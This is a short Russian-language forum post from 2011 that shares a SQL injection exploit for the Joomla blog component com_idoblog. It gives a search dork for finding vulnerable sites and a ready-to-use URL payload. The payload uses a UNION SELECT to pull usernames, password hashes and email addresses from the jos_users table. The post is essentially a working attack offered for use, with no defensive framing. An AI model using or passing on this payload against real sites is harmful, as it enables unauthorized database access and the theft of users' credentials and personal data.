Показать сообщение отдельно

  #197  
Старый 02.01.2011, 02:40
JOSSe7
Новичок
Регистрация: 17.11.2010
Сообщений: 6
С нами: 8150006

Репутация: 0
По умолчанию

Уязвимость: SQL Injection Vulnerability

Компонент: com_idoblog

Dork: inurl:"com_idoblog"

Language: php

http://extensions.joomla.org/extensions/news-production/blog/9218

Exploit:

http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1 337&userid=62+union+select+1,2,concat%28username,0 x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13 ,14,15,16+from+jos_users--
 
Ответить с цитированием